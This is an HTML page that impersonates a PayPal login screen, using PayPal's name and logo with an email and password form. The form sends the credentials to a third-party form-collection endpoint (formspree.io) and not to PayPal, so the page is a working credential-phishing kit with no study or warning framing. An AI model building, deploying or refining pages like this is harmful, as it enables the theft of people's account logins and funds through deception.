<!DOCTYPE html>
<html>

<head>
    <title>PayPal Login Page</title>
    <link rel="shortcut icon" href="logo1.png">
    <link rel=apple-touch-icon href="logo1.png">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        .container {
            width: 100%;
            max-width: 400px;
            margin: 0 auto;
            text-align: center;
        }

        .logo {
            margin-top: 50px;
            margin-bottom: 50px;

        }


        .form-group {
            margin-bottom: 20px;
        }

        label {
            display: block;
            text-align: left;
            margin-bottom: 5px;
        }

        input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            box-sizing: border-box;
            border: none;
            border-radius: 20px;
            border-bottom: 2px solid #ccc;
        }

        input[type="submit"] {
            width: 100%;
            background-color: #0070ba;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            border-radius: 20px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #0066a4;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="logo">
            <img src="logo.png" alt="PayPal Logo">
        </div>
        <form action="https://formspree.io/f/mrgwbzzp" method="POST">
            <div class="form-group">
                <label for="email">Email</label>
                <input type="email" id="email" name="email" required>
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required>
            </div>
            <input type="submit" value="Log In">
        </form>
    </div>
</body>

</html>